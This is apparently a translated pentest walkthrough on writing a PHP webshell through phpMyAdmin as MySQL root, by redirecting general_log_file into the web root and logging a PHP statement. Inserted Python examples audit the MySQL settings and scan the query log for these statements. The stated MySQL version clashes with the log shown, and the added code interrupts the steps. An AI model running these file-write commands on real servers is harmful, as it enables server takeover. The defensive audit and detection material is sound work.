phpMyAdmin getshell
Environment
Win XP
Apache 2.0
PHP 5.3.29
MySQL 5.0.8-dev
Prerequisites:
root privileges on MySQL
Vulnerability test
First, we log in to phpMyAdmin as root.
Try getting a shell with INTO OUTFILE.
Executing the statement above shows that the small webshell has been written.
Because the MySQL version I am using is fairly old, the shell can be written; with MySQL 5.7.6 or later the following error appears instead:
#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement.
The reason is that MySQL has a global variable secure-file-priv. By default this variable is NULL; adding a line secure-file-priv='path' to my.ini is all it takes.
So if the site has done this and INTO OUTFILE is disabled, how do we get a shell?
What is exploited is that MySQL 5.0+ creates log files automatically, so the global variables can be modified to move where the file is written; the directory the log is generated in must, however, be readable and writable for the MySQL process.
First, two MySQL global variables need to be understood:
general_log is the logging state, ON/OFF; when enabled, every executed SQL statement is saved to the log file.
general_log_file is the path the log is saved to.
First check the global variables:
It is currently OFF; change it to ON:
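Both of the settings discussed above (secure_file_priv for INTO OUTFILE, and general_log / general_log_file for the log-redirection trick) are visible to a DBA in SHOW GLOBAL VARIABLES, so the defensive counterpart of this walkthrough is a configuration audit. The following is an added example, not code from the original post: it takes the variable values as a dictionary (the SAMPLE_VARIABLES below are constructed to mirror the state the post ends in) and a list of assumed web-root directories (WEB_ROOTS is hypothetical; a real audit reads them from the web server configuration), and reports the conditions that make the post's technique work.

```python
"""Audit MySQL global variables for the file-write conditions described in the post.

Added example, not part of the original post. Input is the shape returned by
  SHOW GLOBAL VARIABLES WHERE Variable_name IN
    ('secure_file_priv', 'general_log', 'general_log_file');
"""

# Extensions the web server would execute if a log were written under its document root.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp")

# Constructed sample: the state the post leaves the server in.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",            # empty: INTO OUTFILE / LOAD DATA unrestricted
    "general_log": "ON",
    "general_log_file": "C:/www/1.php",  # the path used in the post
}

# Hypothetical web roots for this host (assumption; take these from the web server config).
WEB_ROOTS = ["C:\\www", "C:\\xampp\\htdocs"]


def norm(path: str) -> str:
    """Normalise a path for prefix comparison: forward slashes, lower case, no trailing slash.
    Windows paths are case-insensitive, so the comparison must be too."""
    return path.replace("\\", "/").rstrip("/").lower()


def under_web_root(path: str, web_roots) -> bool:
    """True if path is a web root itself or lies below one."""
    p = norm(path)
    return any(p == norm(r) or p.startswith(norm(r) + "/") for r in web_roots)


def audit(variables: dict, web_roots) -> list:
    """Return (severity, message) findings; an empty list means none of the
    post's preconditions are present."""
    findings = []

    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append(("high",
            "secure_file_priv is empty: INTO OUTFILE and LOAD DATA may use any path the "
            "mysqld account can write or read; set a dedicated directory, or NULL to disable "
            "file import/export"))
    elif sfp and sfp.upper() != "NULL" and under_web_root(sfp, web_roots):
        findings.append(("medium",
            f"secure_file_priv '{sfp}' is inside a web root, so exported files are served "
            "by the web server"))

    # secure_file_priv does not constrain general_log_file, which is the point of the post,
    # so the log path has to be checked on its own.
    log_file = variables.get("general_log_file", "")
    log_on = variables.get("general_log", "OFF").upper() == "ON"
    if log_file and under_web_root(log_file, web_roots):
        findings.append(("high" if log_on else "medium",
            f"general_log_file '{log_file}' is inside a web root "
            f"(general_log is {'ON' if log_on else 'OFF'})"))
    if log_file and norm(log_file).endswith(SCRIPT_EXTENSIONS):
        findings.append(("high",
            f"general_log_file '{log_file}' carries a server-side script extension"))

    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_VARIABLES, WEB_ROOTS):
        print(f"[{severity}] {message}")
```

The audit only reports configuration; the control that actually closes the hole is the one the post mentions in passing, namely that the directory the log is written to must be writable by the MySQL process. Running mysqld under a service account with no write access to the web root makes SET GLOBAL general_log_file='C:/www/1.php' fail regardless of what a root database user does.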
SET GLOBAL general_log='ON'
Looking at the directory, a new file has been created.
Its contents are as follows:
MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
170411 16:02:58 17 Quit
18 Connect root@localhost on
18 Query SET CHARACTER SET 'utf8'
18 Query SET collation_connection = 'utf8_general_ci'
18 Init DB mysql
18 Query SHOW MASTER LOGS
18 Query SELECT USER()
18 Quit
19 Connect root@localhost on
19 Query SET CHARACTER SET 'utf8'
19 Query SET collation_connection = 'utf8_general_ci'
19 Query SHOW DATABASES
19 Quit
170411 16:02:59 20 Connect root@localhost on
20 Query SET CHARACTER SET 'utf8'
20 Query SET collation_connection = 'utf8_general_ci'
20 Quit
21 Connect root@localhost on
21 Query SET CHARACTER SET 'utf8'
21 Query SET collation_connection = 'utf8_general_ci'
21 Quit
Then we execute a statement:
SELECT MD5('admin')
Open the file again:
MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
170411 16:02:58 17 Quit
18 Connect root@localhost on
18 Query SET CHARACTER SET 'utf8'
18 Query SET collation_connection = 'utf8_general_ci'
18 Init DB mysql
18 Query SHOW MASTER LOGS
18 Query SELECT USER()
18 Quit
19 Connect root@localhost on
19 Query SET CHARACTER SET 'utf8'
19 Query SET collation_connection = 'utf8_general_ci'
19 Query SHOW DATABASES
19 Quit
170411 16:02:59 20 Connect root@localhost on
20 Query SET CHARACTER SET 'utf8'
20 Query SET collation_connection = 'utf8_general_ci'
20 Quit
21 Connect root@localhost on
21 Query SET CHARACTER SET 'utf8'
21 Query SET collation_connection = 'utf8_general_ci'
21 Quit
170411 16:04:49 22 Connect root@localhost on
22 Query SET CHARACTER SET 'utf8'
22 Query SET collation_connection = 'utf8_general_ci'
22 Init DB mysql
22 Query SHOW MASTER LOGS
22 Quit
23 Connect root@localhost on
23 Query SET CHARACTER SET 'utf8'
23 Query SET collation_connection = 'utf8_general_ci'
23 Quit
170411 16:05:06 24 Connect root@localhost on
24 Query SET CHARACTER SET 'utf8'
24 Query SET collation_connection = 'utf8_general_ci'
24 Query SELECT MD5('admin')
24 Init DB mysql
24 Query SHOW MASTER LOGS
24 Quit
170411 16:05:07 25 Connect root@localhost on
25 Query SET CHARACTER SET 'utf8'
25 Query SET collation_connection = 'utf8_general_ci'
25 Quit
Since the statement text is written to the file verbatim, the rest is easy: we can write the shell directly.
SET GLOBAL general_log_file='C:/www/1.php'
1.php is created, and then we can write the shell into it:
SELECT '<?php phpinfo(); ?>'
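The general query log records each statement as it is received, so the SET GLOBAL general_log_file statement itself lands in the old log file before the switch, and the statements that follow land in the new one. That makes the log excerpts shown above a usable detection source. The following is an added example, not code from the original post: it parses lines in the 5.5-style format printed above (timestamp only on the first line of a second, "Init DB" as a two-word command), tracks which account owns each connection id, and flags the statements this post relies on. SAMPLE_LOG is constructed to mirror the post's session.

```python
"""Scan MySQL general-query-log lines for the log-redirection pattern used in the post.

Added example, not part of the original post. Matches the 5.5-style log format shown
on the page; the sample lines are constructed.
"""
import re
from dataclasses import dataclass

# Timestamp appears only when the second changes, so it is optional.
LINE_RE = re.compile(
    r"^\s*(?:(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+)?"
    r"(?P<id>\d+)\s+"
    r"(?P<cmd>Connect|Init DB|Query|Quit|Prepare|Execute|Close stmt|Field List)"
    r"\s*(?P<arg>.*)$"
)

# Detection rules: name and the statement pattern that triggers it.
RULES = [
    ("general_log_file redirected",
     re.compile(r"\bSET\s+(?:GLOBAL\s+|@@global\.)?general_log_file\b", re.I)),
    ("general_log switched on by a client",
     re.compile(r"\bSET\s+(?:GLOBAL\s+|@@global\.)?general_log\s*=\s*'?(?:ON|1)\b", re.I)),
    ("file write via INTO OUTFILE/DUMPFILE",
     re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I)),
    ("script tag in statement text",
     re.compile(r"<\?(?:php\b|=)", re.I)),
]

# Constructed excerpt in the page's format, modelled on the session the post describes.
SAMPLE_LOG = """\
170411 16:05:06    24 Connect   root@localhost on
                   24 Query     SET CHARACTER SET 'utf8'
                   24 Query     SELECT MD5('admin')
                   24 Quit
170411 16:07:12    26 Connect   root@localhost on
                   26 Query     SET GLOBAL general_log_file='C:/www/1.php'
                   26 Query     SELECT '<?php phpinfo(); ?>'
                   26 Quit
""".splitlines()


@dataclass
class Alert:
    conn_id: int
    user: str       # account from the Connect record of the same connection id
    rule: str
    statement: str


def scan(lines) -> list:
    """Return one Alert per Query line that matches a rule, attributed to its connection's user."""
    users = {}
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # header lines such as "Time Id Command Argument"
        cid, cmd, arg = int(m["id"]), m["cmd"], m["arg"].strip()
        if cmd == "Connect":
            # "root@localhost on mysql" or "root@localhost on" -> "root@localhost"
            users[cid] = arg.split(" on", 1)[0]
        elif cmd == "Query":
            for name, pattern in RULES:
                if pattern.search(arg):
                    alerts.append(Alert(cid, users.get(cid, "?"), name, arg))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"conn {a.conn_id} {a.user}: {a.rule}: {a.statement}")
```

A second, file-side check complements this: any file under the web root whose first line matches the general-log header (", Version: ... started with:") was written by mysqld, not deployed by the application, and its presence means the redirection has already happened.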